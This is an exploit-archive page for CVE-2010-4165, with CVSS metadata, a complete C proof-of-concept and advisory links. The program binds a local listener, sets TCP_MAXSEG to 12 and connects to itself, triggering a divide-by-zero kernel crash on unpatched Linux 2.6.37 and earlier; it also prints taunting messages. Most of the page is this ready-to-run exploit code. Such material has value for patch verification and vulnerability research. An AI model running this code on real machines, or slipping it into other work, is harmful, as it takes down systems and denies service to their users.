Linux Kernel <= 2.6.37 Local Kernel Denial of Service

2011.03.02

Credit: prdelka

Risk: Low

Local: Yes

Remote: No

CVE: CVE-2010-4165

CWE: CWE-189

CVSS Base Score: 4.9/10

Impact Subscore: 6.9/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Complete

/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)
* =======================================================
* A divide by 0 error occurs in tcp_select_initial_window
* when processing user supplied TCP_MAXSEG facilitating a
* local denial-of-service condition (kernel oops!) in all
* Linux Kernel 2.6.x branch (2.6.37 & below). This issue
* can be triggered easily with a call to setsockopt() on
* a listening network socket and then establishing a TCP
* connection to the awaiting socket.
*
* -- prdelka
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
int main() {
int optval, optlen, ret, sd, sd2, pid;
char *host = "localhost";
struct sockaddr_in locAddr;
struct sockaddr_in servAddr;
struct sockaddr_in dstAddr;
printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n");
sd = socket(AF_INET, SOCK_STREAM, 0);
memset(&servAddr,0,sizeof(servAddr));
memset(&dstAddr,0,sizeof(dstAddr));
servAddr.sin_family = AF_INET;
servAddr.sin_port = htons(60000);
servAddr.sin_addr.s_addr = INADDR_ANY;
dstAddr.sin_family = AF_INET;
inet_aton("127.0.0.1", &dstAddr.sin_addr);
dstAddr.sin_port = htons(60000);
if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){
printf("[ Cannot bind listener service\n");
exit(-1);
}
listen(sd,4);
optval = 12;
ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));
if(ret==0)
{
printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n");
int sin_size = sizeof(struct sockaddr_in);
switch(pid = fork())
{
case 0:
sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);
sleep(3);
default:
sd2 = socket(AF_INET, SOCK_STREAM, 0);
connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));
sleep(3);
}
}
printf("[ System is patched, no dreams for this prince\n");
return 0;
}

References:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7a1abd08d52fdeddb3e9a5a33f2f15cc6a5674d2

https://bugzilla.redhat.com/show_bug.cgi?id=652508

http://www.vupen.com/english/advisories/2011/0298

http://www.vupen.com/english/advisories/2011/0124

http://www.vupen.com/english/advisories/2011/0012

http://www.spinics.net/lists/netdev/msg146495.html2000

http://www.spinics.net/lists/netdev/msg146405.html

http://www.securityfocus.com/bid/44830

http://www.osvdb.org/69241

http://www.openwall.com/lists/oss-security/2010/11/12/4

http://www.openwall.com/lists/oss-security/2010/11/12/1

http://www.mandriva.com/security/advisories?name=MDVSA-2011:029

http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.37-rc2

http://secunia.com/advisories/42932

http://secunia.com/advisories/42801

http://secunia.com/advisories/42778

http://lists.opensuse.org/opensuse-security-announce/2011-02/msg00000.html

http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00004.html

http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00001.html

http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00000.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Linux Kernel <= 2.6.37 Local Kernel Denial of Service

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.